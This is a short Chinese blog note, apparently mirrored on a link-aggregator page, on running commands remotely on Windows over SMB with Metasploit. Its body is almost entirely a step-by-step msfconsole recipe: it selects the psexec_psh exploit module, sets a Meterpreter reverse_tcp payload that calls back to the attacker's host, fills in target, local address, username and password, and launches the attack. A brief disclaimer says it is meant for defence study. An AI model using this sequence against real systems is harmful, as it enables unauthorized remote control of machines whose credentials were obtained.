9

【笔记】msf向Windows远程执行DOS命令

 1 year ago
source link: https://feiju12138.github.io/2022/05/13/msf%E5%90%91Windows%E8%BF%9C%E7%A8%8B%E6%89%A7%E8%A1%8CDOS%E5%91%BD%E4%BB%A4/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

【笔记】msf向Windows远程执行DOS命令

2022-05-13

1

在已知Windows登陆口令的前提下,使用msf通过smb协议,远程执行DOS命令

本文仅用于网络信息防御学习

设置使用的模块

msf > use exploit/windows/smb/psexec_psh

设置payload

msf > set payload windows/meterpreter/reverse_tcp

设置远程的地址

<ip>:远程ip地址

msf > set RHOSTS <ip>

设置本机地址

<ip>:本机ip地址

msf > set LHOST <ip>

设置远程用户名

<username>:用户名

msf > set SMBUSER <username>

设置远程密码

<password>:密码,如果为空就留空

msf > set SMBPASS <password>

msf > set SMBPASS
msf > exploit

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK